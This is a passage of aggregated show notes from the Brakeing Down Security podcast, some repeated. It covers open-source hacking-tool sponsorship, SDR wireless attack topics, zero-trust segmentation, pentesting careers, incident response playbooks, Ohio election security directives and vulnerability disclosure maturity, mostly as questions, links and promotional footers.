true anymore --brbr) What is the 'status quo' of OSS infosec/hacking tool developer community (in your opinion)? Pull requests, what is 'meaningful' contributions? What is the definition of 'widely-used'? Why support widely-used OSS hacking tools? (2) Marcello on Twitter: "Well also be encouraging community contributions to those same tools by giving out 1 @offsectraining training voucher per quarter to whoever submits the most meaningful pull request to any of the tools in the @porchetta_ind Discord server" / Twitter And now for something completely different... (porchetta.industries) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec #cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP #porchetta #training #sponsorship #github #opensource #crackmapexec #byt3bl33d3r #marcelloSalvati

https://www.hak4kidz.com/activities/cdcedu.html Online CTF training using Cisco's Workshop platform. They did something similar in Spring of 2020. There will be an online panel where kids can ask questions about information security. Occurs on December 12th. Check out the link for more info. Robert M. for upping his patreon to $5 Top 25 Data Security Podcasts You Must Follow in 2020 (feedspot.com) @byt3bl33d3r (Marcello Salvati) @porchetta_ind (porchetta Industries) [email protected] Wanna sponsor CrackMapExec? Sponsor @byt3bl33d3r on GitHub Sponsors Github sponsors: GitHub Sponsors Introducing Sponsorware: How A Small Open Source Package Increased My Salary By $11k in Two Days | Caleb Porzio How is this different than shareware? "As a developer of one of these tools, you obviously start questioning your life decisions after a while. Especially after putting so much time into these projects." Adblockers installed 300,000 times are malicious and should be removed now | Ars Technica (spent years supporting the app… the vitriol from 'unpaid customers' is deafening… Should be required reading for anyone wanting to open source anything.) [Announcement] Recent and upcoming changes to the Nano projects · Issue #362 · NanoAdblocker/NanoCore (github.com) Business model for typical opensource projects. Where's the chain broken at? Devs who expect help/support for their project? "Many eyes make for less vulns" (LOL, sounds good, not true anymore --brbr) What is the 'status quo' of OSS infosec/hacking tool developer community (in your opinion)? Pull requests, what is 'meaningful' contributions? What is the definition of 'widely-used'? Why support widely-used OSS hacking tools? (2) Marcello on Twitter: "Well also be encouraging community contributions to those same tools by giving out 1 @offsectraining training voucher per quarter to whoever submits the most meaningful pull request to any of the tools in the @porchetta_ind Discord server" / Twitter And now for something completely different... (porchetta.industries) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec #cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP #porchetta #training #sponsorship #github #opensource #crackmapexec #byt3bl33d3r #marcelloSalvati

Sébastien Dudek - @FlUxIuS @penthertz Why we are here today? Software Defined Radio (sdr-radio.com) What kind of hardware or software do you need? Why would a security professional want to know how to use SDR tools and attacks? What other kinds of attacks can be launched? (I mean, other than replay type attacks) Door systems (badge systems) NFC? Contactless credit card attacks Smart building/home control systems Bluetooth attacks Point Of Sale systems Cellular radio 3g/4g/5g Industrial control systems Home appliances Medical telemetry systems Drones! LoRa - Wikipedia DASH7 - Wikipedia - custom TCP stack for LoRa Vehicle-to-grid - Wikipedia (V2G) Automatic Wireless Protocol Reverse Engineering | USENIX Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek How Can Drones Be Hacked? The updated list of vulnerable drones & attack tools | by Sander Walters | Medium Carrier Aggregation explained (3gpp.org) Mobile phone jammer - Wikipedia World's top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard Supply chain attacks - systems tend to use wireless chipsets or protocols LTE-torpedo-NDSS19.pdf (uiowa.edu) -privacy attacks on 4g/5g networks using side channel information How does someone make a faraday cage on the cheap? (mentioned in one of your class agendas) Lots of IoT devices use your typical home wifi connection, can't you just sniff packets to get what you need? Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io) Attacks on Tesla wireless entry: Tesla's keyless entry vulnerable to spoofing attack, researchers find - The Verge Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical Kid's toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED What are the current limitations to testing wireless and RF related systems? What about custom wireless implementations? Cellular? Zigbee? I'm a wireless manufacturer of some kind of device. I'm freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me? Wireless defense system? https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)

**Apologies on the Zoom issues** This is the 2nd of 3 sponsored podcast interviews with Illumio about Their zero trust product. Katey Wood is the Director of Product Marketing at Illumio. https://www.linkedin.com/in/kateywood/ Topic: Conversation on segmentation and ransomware Topic Background: The attack surface and vulnerabilities are on the rise, along with cyber attacks Why? Remote everything - cloud collaboration (including processing PII) is the new normal and that means the attack surface is heightened. This requires appropriate network, cloud, and endpoint security. Double ransom with #data #exfiltration -- more attackers are exfiltrating customer data from businesses and (if ransom is withheld) extorting consumers directly through bitcoin - often in the headlines. Privacy is a chief security concern now more than ever before, as remote everything continues and #cyberattacks and #ransomware attacks skyrocket. For businesses, Covid and the new WFH normal means even more vulnerabilities and greater incentive to pay an even higher ransom to avoid privacy law penalties and class-action litigation. Enter Segmentation. Perimeter security is important, but unfortunately, we all know that alone it's not enough (i.e. breach, after breach, after high-profile breach). #ZeroTrust the assume breach mentality/default deny are philosophies that take security deeper to protect organizations from a threat moving laterally within their environment. This is helpful because it's often not the initial point of breach that causes so much damage – it's the breach spreading to more critical data and assets that's so destructive. #Network #segmentation is a crucial control to secure critical data and PII, by ring-fencing applications with patient or client data. Implementing Zero Trust security policies limits access to only allowed parties with a legitimate business purpose and stops the attacker from moving freely across the network to the most valuable data. #Illumio helps #healthcare, academic, and other critical industries keep their crown jewels safe through better, more scalable micro-segmentation that decouples Zero Trust from the constraints of the network by implementing it on the workload. Vertical 'Brakedown' - Healthcare and Education Businesses in the healthcare and education industry often have large numbers of customers and employees, and handle large volumes of PII, are especially at risk. Both have already been under scrutiny for privacy concerns around PII for years, through regulations like #HIPAA in healthcare and #FERPA in education (and now #CCPA). Now that distance learning is the norm and medical records have gone largely electronic, it's even easier for attackers to move between systems if there are no network segmentation access policies in place to prevent it. Potential Questions: Customer data cases: 'Dead data' With today's workforce largely remote, tell me what that means from a security standpoint. What challenges are businesses facing to protect important data/PII? What is that data "worth" and what are the consequences of falling victim to a ransomware attack or similar event from a bad actor? Talk to me about the "assume breach mentality." What does that mean and how can you/why should you use this philosophy in your approach to security? How does segmentation relate to compliance? How do the two go hand in hand? How does segmentation protect organizations against large scale breaches? In terms of cost, is segmentation a sizable investment for SMBs? Is it a worthwhile investment, in terms of dollars saved from ransomware attacks? #Segmentation is often thought of as a big (perhaps cumbersome) project – how do you suggest organizations make it more scalable? How does segmentation protect end users?

Phillip Wylie @philipwylie and kim Crawley @kim_crawley Amazon: The Pentester BluePrint: Your Guide to Being a Pentester: 9781119684305: Computer Science Books @ AmazonSmile November 24th for paper copy Steven levy: Hackers: Heroes of the Computer Revolution: Steven Levy: 9781449388393: Amazon.com: Books Why did you write the book? What is a pentester? Skills needed Education of hacker Building a lab Kali linux Pentester Framework Docker OWASP Juice Box Vulnhub Overthewire PicoCTF Developing a plan Gaining experience Gaining employmen Better hiring - Sarah on Twitter: "I want more women and enbies in pentesting/red teaming. I would really like to know how to do that. But as teams usually only hire people with experience, I'm at a bit of a loss for how to get people into the field at all. (I would like to not be an exception)" / Twitter Hacking is not Crime - hackivist org? https://www.hackingisnotacrime.org/ Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec #cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP

"Between stimulus and response there is a space. In that space is our power to choose our response. In our response lies our growth and our freedom. --Victor Frankl https://smile.amazon.com/Mans-Search-for-Meaning-audiobook/dp/B0006IU470 https://twitter.com/conordsherman Conor Sherman - IR stories and more Security Strategy and Incident Response, eZCater Confident Defense Podcast - https://www.confidentdefense.com/podcast https://www.linkedin.com/in/conordsherman/ Agenda: Bio (How did I get here?) Prior preparation and planning prevents poor performance - https://military.wikia.org/wiki/7_Ps_(military_adage) Discover Unique malware FIN 6 - https://www.zdnet.com/article/cybercrime-group-fin6-evolves-from-pos-malware-to-ransomware/ FIN 7 - https://threatpost.com/fin7-retools/149117/ CCPA - https://oag.ca.gov/privacy/ccpa CIS 20 is 'reasonable security program' per California AG - https://www.prnewswire.com/news-releases/california-attorney-general-concludes-that-failing-to-implement-the-center-for-internet-securitys-cis-critical-security-controls-constitutes-a-lack-of-reasonable-security-300223659.html IBM breach cost: "Cost Of A data Breach" (Search This) https://newsroom.ibm.com/2020-07-29-IBM-Report-Compromised-Employee-Accounts-Led-to-Most-Expensive-Data-Breaches-Over-Past-Year Cloud Infra Compliance- Governance as Code - https://www.cio.com/article/3277611/governance-as-code-keeping-pace-with-the-rate-of-change-in-the-cloud.html "In the future, governance as code will be the backbone driving our IT systems and services. It will enable us to deliver consistent, efficient and highly repeating business outcomes at the lowest possible cost, with the maximum availability and security, while also allowing our people to expand into new and higher value-add roles across business." Detection as Code "Freedom within Limits" - Security as Solutions Engineers https://www.howwemontessori.com/how-we-montessori/2020/02/freedom-within-limits-what-it-looks-like-in-our-home-with-three-children.html Sigma: https://github.com/Neo23x0/sigma "Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file." Japan CIRT event ID whitepaper: https://www.jpcert.or.jp/english/pub/sr/DetectingLateralMovementThroughTrackingEventLogs_version2.pdf https://jpcertcc.github.io/ToolAnalysisResultSheet/ https://shield.mitre.org/ "Shield is an active defense knowledge base MITRE is developing to capture and organize what we are learning about active defense and adversary engagement. Derived from over 10 years of adversary engagement experience, it spans the range from high level, CISO ready considerations of opportunities and objectives, to practitioner friendly discussions of the TTPs available to defenders." IR Playbooks - process of creating them (probably the hardest) Implementation Tabletop exercise (length, stakeholders, crafting a scenario to compare against) What if an org has nothing? "We just blow up the environment and start over." RTO/RPO metrics: How long can you survive as a company with an outage? How long does it take to get back online and operational? What's your appetite for the risk of that? Lots of dependencies to creating https://swimlane.com/blog/incident-response-playbook Tabletop discussion - sponsors involved Initiating condition Threat modeling Process steps Best practices and local policies End state - what is the goal? (eradicate infection, back to operating status) Relation to governance/regulatory reqs. (do we have to report? What do we report? Fallout from incident, etc) Lessons Learned https://sbscyber.com/resources/7-steps-to-building-an-incident-response-playbook (seems like there are different methodologies) Why are the things that will give organizations the biggest benefit over time the cause of the most consternation? Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App:

Previous Election Security podcast: https://brakeingsecurity.com/2018-042-election-security-processes-in-the-state-of-ohio Jeremy Mio (@cyborg00101) https://itsecurity.cuyahogacounty.us/ Ohio Counties Meet LaRose's Deadline to Strengthen Election Security - Ohio Secretary of State (ohiosos.gov) (added cybersecurity Directives during 2018 last podcast -jmio) Directive 2018-15 (6/21/18) - Cybersecurity EI-ISAC Membership, DHS Services, IDS (Albert) Monitoring, Elections Infrastructure Security Assessment, Secure Online Services (DDoS Protection), examples via the State: Win10, DB Monderization, MFA, Cloud Email Pilot, IT Support Pilot Directive 2018-30 (9/28/18) - Reminder and Additional Clarifications Einstein (US-CERT program) - Wikipedia Albert Program (added new cybersecurity Directives since last podcast -jmio) Directive 2019-07 (5/06/19) - Specifics on security event reporting (expansion on 2017 Directive) Directive 2019-08 (6/11/19) - Expansion on 2018 and technical guides Continuing 2018 requirements: EI-ISAC members, phishing tests, vulnerability scanning, continue to secure online systems (TLS/DDoS) Remediate all high priority findings from 2018 assessment by 1/31/2020 Additional technical requirements Additional DHS Services requested by 7/19/2019 (mitigate high findings by 1/31/20): Risk and Vulnerability assessment, Remote Pen Test, Arch Design Review, Cyber Threat Hunt Others: 2019 TTX, required all to use .US or .GOV domain, Annual assessments and background checks, Technical procurement guide, DMARC LaRose issues directive to set a new standard for election security in 2020 (added -jmio) LaRose Announces Pick For Chief Information Security Officer Directive 2020-12 (7/14/20): Additional cybersecurity (and others) requirements by 8/28/2020 Cybersecurity Liaisons Extended IDS Albert funding and SIEM Services New: EDR and MDBR by 8/28/2020 (and additional push for DMARC) Securing Online Services and WAF, and requiring DHS Services Annually Vulnerability Management: Critical and High SLA Continue Annual cybersecurity training and background checks (including vendor/contractors), Physical Security Training Emergency Planning with local EMA and Sheriff Vuln disclosure policy: Vulnerability Disclosure Policy - Ohio Secretary of State (ohiosos.gov) Did anyone think to pentest the vuln acceptance form? (lol, layers in layers --brbr) 8/11/20: LAROSE ISSUES FIRST IN THE NATION SECRETARY OF STATE VULNERABILITY DISCLOSURE POLICY (added -jmio) DHS Vulnerability Disclosure Policy Directive Ohio to ramp up election security with new federal funds | TheHill "Ohio has taken steps to combat those types of threats. In October, Ohio Gov. Mike DeWine (R) signed into law a measure that required post-election audits to ensure the accuracy of the vote count, and created a "civilian cyber security reserve" to defend against potential cyberattacks. Directive 2020-12 - "Cybersecurity Liaisons" (added -jmio) LaRose says invitation to hackers will set new election security standard; expert says it's risky (wcpo.com) "His [secretary of state LaRose] first-of-its-kind Vulnerability Disclosure Policy invites Ohio's crop of "white-hat" hackers — the good guys, opposite malevolent "black-hat" hackers — to break into the state's election system, find bugs and report them so officials can ensure they're fixed by Election Day. There are some strings attached: White hats aren't allowed to phish for information or tamper with electronic county voter registration systems, and actual voting machines — legally barred from being connected to the internet — are off-limits. If they do find sensitive information, they're expected to report it." How did the threat model shift from the last time we talked? What has changed in terms of organization and threats? You mentioned 4-5 different voting regions last time, all with different levels of technology. Any updates on the tech? How did covid change how voting occurred? How have you leveraged the Elections Infrastructure ISAC (EI-ISAC) in passing along threats and sharing information? LAROSE TAKES ACTION IN RESPONSE TO IRANIAN CYBER THREATS (added -jmio) Has insider threat been part of your threat model and what has your group done to minimize the chances? (why does it feel like the Oscars has more scrutiny in terms of voting security than the US democratic process? --brbr) What does physical security look like in terms of people going to the polls? (wasn't sure if that was something in your purview --brbr) (this is not (Election Board and Sheriff), but can discuss high level -jmio) Using hardware domain block services? Malicious Domain Blocking and Reporting (MDBR) Newest Service for U.S. SLTTs (cisecurity.org) LaRose Setting New Standard For Election Security - Ohio Secretary of State (ohiosos.gov) 88 election districts will have access to domain blocking tech (mandated to start by 28 August 2020), cybersecurity experts. Can you give us an update on any of what was mentioned in the press re

Phil Beyer - Bio (CISO at Etsy) Importance on books about behavioral science. "Thinking Fast and Slow": https://smile.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555 "Predictably irrational": https://smile.amazon.com/Predictably-Irrational-Revised-Expanded-Decisions/dp/0061353248/ http://humanhow.com/list-of-cognitive-biases-with-examples/ Influence: the Psychology of Persuasion: https://smile.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X Brain at Work: https://smile.amazon.com/Your-Brain-Work-Revised-Updated/dp/0063003155/ Atomic habits: https://smile.amazon.com/Atomic-Habits-Proven-Build-Break/dp/0735211299/ Tiny habits: https://smile.amazon.com/Tiny-Habits-Changes-Change-Everything/dp/0358003326/ New leaders 100 day action plan: https://smile.amazon.com/New-Leaders-100-Day-Action-Plan/dp/1119223237/ Podcasts: Manager Tools Podcast: https://manager-tools.com Career Tools Podcast: https://www.manager-tools.com/all-podcasts?field_content_domain_tid=5 Seth Godin Akimbo: https://www.akimbo.link/ Masters of scale: https://mastersofscale.com/ Habit stacking - Temptation bundling - Availability Heuristic: https://en.wikipedia.org/wiki/Availability_heuristic Brian's Recommendations: Extremely Popular Delusions and the Madness of Crowds: https://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1463740514 Big 9: https://www.amazon.com/Big-Nine-Thinking-Machines-Humanity/dp/154177373X Bryan's Book Recommendations: Malcolm Gladwell's Talking to Strangers: https://smile.amazon.com/Talking-to-Strangers-audiobook/dp/B07NJCG1XS The Effective Manager by Mark Horstman: https://smile.amazon.com/The-Effective-Manager-audiobook/dp/B071JSWHBJ ADKAR: A Model for Change in Business, Government and our Community https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504 Improved interviews online First 90 days as CISO First 90 day plan: https://www.manager-tools.com/2012/06/90-day-new-job-plan-overview Capability Assessment: https://www.strategyand.pwc.com/gx/en/unique-solutions/capabilities-driven-strategy/capabilities-assessment.html Socratic method: https://en.wikipedia.org/wiki/Socratic_method Impacts to make Building rapport with new directs Creating a new relationship 'budget' with manager/board, colleagues Planning your strategy to make meaningful change in the org as a whole Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec #cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP

Spokesperson: Neil Patel (Sr. Technical Marketing Engineer) Topic: Zero trust and segmentation market http://brakeingsecurity.com/2020-023-jame-nelson-from-illumio-cyber-resilence-business-continuity What is Zero Trust and why should companies adopt a Zero Trust philosophy? Amanda: What are one of the more important steps someone should take when looking to implement zero trust? How does segmentation fit in a Zero Trust model? What are some of the challenges and benefits that come with segmentation? Are there real-world examples of how segmentation has stopped a breach and how that relates to the Zero Trust philosophy? How can Zero Trust principles help prevent the spread of ransomware or another security epidemic? Do you need 100% asset mgmt already before implementing or is that part of what you do as well? Integrations: you mentioned auth functions, but how integrated can Illumio go with your env? EDR? NDR? (saw on your site, you're fully integrated with Crowdstrike falcon) Tell us more about the Forrester Wave? What do the findings mean and why do they matter? https://www.illumio.com/resource-center/research-report/forrester-wave-zero-trust-2020 https://www.illumio.com/ Twitter: https://twitter.com/illumio LinkedIn: https://www.linkedin.com/company/illumio/mycompany/

Phil Beyer - Bio (CISO at Etsy) Importance on books about behavioral science. "Thinking Fast and Slow": https://smile.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555 "Predictably irrational": https://smile.amazon.com/Predictably-Irrational-Revised-Expanded-Decisions/dp/0061353248/ http://humanhow.com/list-of-cognitive-biases-with-examples/ Influence: the Psychology of Persuasion: https://smile.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X Brain at Work: https://smile.amazon.com/Your-Brain-Work-Revised-Updated/dp/0063003155/ Atomic habits: https://smile.amazon.com/Atomic-Habits-Proven-Build-Break/dp/0735211299/ Tiny habits: https://smile.amazon.com/Tiny-Habits-Changes-Change-Everything/dp/0358003326/ New leaders 100 day action plan: https://smile.amazon.com/New-Leaders-100-Day-Action-Plan/dp/1119223237/ Podcasts: Manager Tools Podcast: https://manager-tools.com Career Tools Podcast: https://www.manager-tools.com/all-podcasts?field_content_domain_tid=5 Seth Godin Akimbo: https://www.akimbo.link/ Masters of scale: https://mastersofscale.com/ Habit stacking - Temptation bundling - Availability Heuristic: https://en.wikipedia.org/wiki/Availability_heuristic Brian's Recommendations:Extremely Popular Delusions and the Madness of Crowds: https://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1463740514 Big 9: https://www.amazon.com/Big-Nine-Thinking-Machines-Humanity/dp/154177373X Bryan's Book Recommendations: Malcolm Gladwell's Talking to Strangers: https://smile.amazon.com/Talking-to-Strangers-audiobook/dp/B07NJCG1XS The Effective Manager by Mark Horstman: https://smile.amazon.com/The-Effective-Manager-audiobook/dp/B071JSWHBJ ADKAR: A Model for Change in Business, Government and our Community https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504 Improved interviews online First 90 days as CISO First 90 day plan: https://www.manager-tools.com/2012/06/90-day-new-job-plan-overview Capability Assessment: https://www.strategyand.pwc.com/gx/en/unique-solutions/capabilities-driven-strategy/capabilities-assessment.html Socratic method: https://en.wikipedia.org/wiki/Socratic_method Impacts to make Building rapport with new directs Creating a new relationship 'budget' with manager/board, colleagues Planning your strategy to make meaningful change in the org as a whole Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec #cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP

Introduce Katie (bio) (@k8em0) CEO and Owner, LutaSecurity The scope of the VCMM (what is it?) VCMM - Vulnerability Coordination Maturity Model https://www.lutasecurity.com/vcmm Just covers the internal process? To ready an org for a bug bounty program or to accept vulns from security researchers? You mentioned not playing whack-a-mole, when it comes to responding at the beginning of a vuln disclosure program. Is the directing of different categories of bugs one of the things that goes into not having to just wait for the bugs to roll in? Will this work for internal security or red teams as well, or is this more suited to bug bounties? What's the timeline for this process? "We need something for a product launch next week…" Stakeholders involved? CISO? Security team? IT? Devs? What precipitates the need for this? Maturity? Vuln Disclosure? Are the ISO docs required for this to work, or will they assist in an easier outcome? https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/ https://www.rsaconference.com/industry-topics/video/bug-bounty-programs-arent-enough-for-todays-cyber-threats-katie-moussouris-rsac 10 worst jobs (popsci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html https://www.nbcnews.com/tech/security/how-teenage-fortnite-player-found-apple-s-facetime-bug-why-n963961 How does an org use this to communicate vulnerabilities in their own products? What's the bare minimum you need on this chart for a successful program? Are any facets more important than the others? Does anyone hit all 3s, or is that a pipedream? Incentive "no legal action will be taken". People want money… not tours, not 10-point font. How do you convince 'good' bug writers to want to help you for a 'thank you'? Should incentive be a 'Level 3' or would you consider it not ready for prime-time? https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/ Vuln reporting Lots of Twitter fodder of companies that handle vuln disclosure poorly, even folks say that you shouldn't bother and deal with a 3rd party. If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier? Security.txt? Clearly stated bugs@ or Security@ (and not buried in 3 point font in the privacy policy, or ToS) SLA to reply to all bugs? Standardized disclosure form for discoveries? Slide Presentation Overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf ISO 29147:2018 - $150 USD https://www.iso.org/standard/72311.html ISO 30111:2019 - $95 USD https://www.iso.org/standard/69725.html ISO 27034-7:2018 - $150 USD https://www.iso.org/standard/66229.html Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Introduce Katie (bio) (@k8em0) CEO and Owner, LutaSecurity The scope of the VCMM (what is it?) VCMM - Vulnerability Coordination Maturity Model https://www.lutasecurity.com/vcmm Just covers the internal process? To ready an org for a bug bounty program or to accept vulns from security researchers? You mentioned not playing whack-a-mole, when it comes to responding at the beginning of a vuln disclosure program. Is the directing of different categories of bugs one of the things that goes into not having to just wait for the bugs to roll in? Will this work for internal security or red teams as well, or is this more suited to bug bounties? What's the timeline for this process? "We need something for a product launch next week…" Stakeholders involved? CISO? Security team? IT? Devs? What precipitates the need for this? Maturity? Vuln Disclosure? Are the ISO docs required for this to work, or will they assist in an easier outcome? https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/ https://www.rsaconference.com/industry-topics/video/bug-bounty-programs-arent-enough-for-todays-cyber-threats-katie-moussouris-rsac 10 worst jobs (popsci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html https://www.nbcnews.com/tech/security/how-teenage-fortnite-player-found-apple-s-facetime-bug-why-n963961 How does an org use this to communicate vulnerabilities in their own products? What's the bare minimum you need on this chart for a successful program? Are any facets more important than the others? Does 